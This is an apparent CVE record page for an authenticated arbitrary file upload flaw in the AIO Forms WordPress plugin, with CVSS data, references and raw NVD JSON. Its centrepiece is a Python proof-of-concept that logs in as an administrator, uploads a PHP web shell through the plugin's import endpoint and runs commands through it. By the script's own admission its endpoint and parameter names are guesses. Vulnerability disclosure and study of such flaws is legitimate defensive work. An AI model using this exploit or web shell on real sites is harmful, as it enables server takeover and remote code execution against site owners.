Security Vulnerability Report
CVE-2025-11889 CVSS 7.2 HIGH


Published: 2025-10-24 09:15:43
Last Modified: 2026-04-15 00:35:42

Description

The AIO Forms – Craft Complex Forms Easily plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the import functionality in all versions up to, and including, 1.3.18. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AIO Forms – Craft Complex Forms Easily <= 1.3.18 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-11889 PoC - AIO Forms WordPress Plugin Arbitrary File Upload
# Target: WordPress site with AIO Forms plugin <= 1.3.18
# Authenticated as Administrator or higher

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "admin"
PASSWORD = "password"


def get_auth_token():
    """Obtain WordPress nonces and authentication cookies"""
    login_url = f"{TARGET_URL}/wp-login.php"
    session = requests.Session()

    # Get login page to obtain nonce
    response = session.get(login_url)

    # Attempt login
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    response = session.post(login_url, data=login_data, allow_redirects=True)

    if 'wordpress_logged_in' not in session.cookies:
        print("[-] Authentication failed")
        return None, None

    print("[+] Authentication successful")
    return session, session.cookies


def upload_webshell(session, cookies):
    """Upload malicious PHP file via import functionality"""
    # PHP webshell content
    webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"

    # Find the import endpoint
    import_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"

    # Prepare the malicious file
    files = {
        'file': ('malicious.php', webshell, 'application/x-php')
    }

    # The actual parameter names may vary - this is a generic approach
    data = {
        'action': 'aio_forms_import',
        'nonce': 'extracted_nonce_here'
    }

    print("[*] Attempting to upload webshell...")
    response = session.post(import_url, files=files, data=data, cookies=cookies)

    # Check for successful upload
    if response.status_code == 200:
        print("[+] File upload may have succeeded")
        print(f"[+] Response: {response.text}")

        # Try to access the uploaded file
        webshell_url = f"{TARGET_URL}/wp-content/uploads/malicious.php"
        test_response = session.get(webshell_url, params={'cmd': 'whoami'})
        if test_response.status_code == 200:
            print(f"[+] Webshell uploaded!\nAccess at: {webshell_url}")
            print(f"[+] Command output: {test_response.text}")
            return True

    print("[-] Upload failed or target not vulnerable")
    return False


if __name__ == "__main__":
    session, cookies = get_auth_token()
    if session:
        upload_webshell(session, cookies)

# Note: This PoC requires valid administrator credentials.
# The actual exploitation may require additional enumeration to find
# the correct upload endpoint and parameter names.
```

References

- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3400661%40all-in-one-forms&new=3400661%40all-in-one-forms&sfp_email=&sfph_mail=
- https://wordpress.org/plugins/all-in-one-forms/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/6dc69491-0f40-4bab-9215-b25f72110e26?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11889",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-24T09:15:43.353",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The AIO Forms – Craft Complex Forms Easily plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the import functionality in all versions up to, and including, 1.3.18. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3400661%40all-in-one-forms&new=3400661%40all-in-one-forms&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://wordpress.org/plugins/all-in-one-forms/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6dc69491-0f40-4bab-9215-b25f72110e26?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```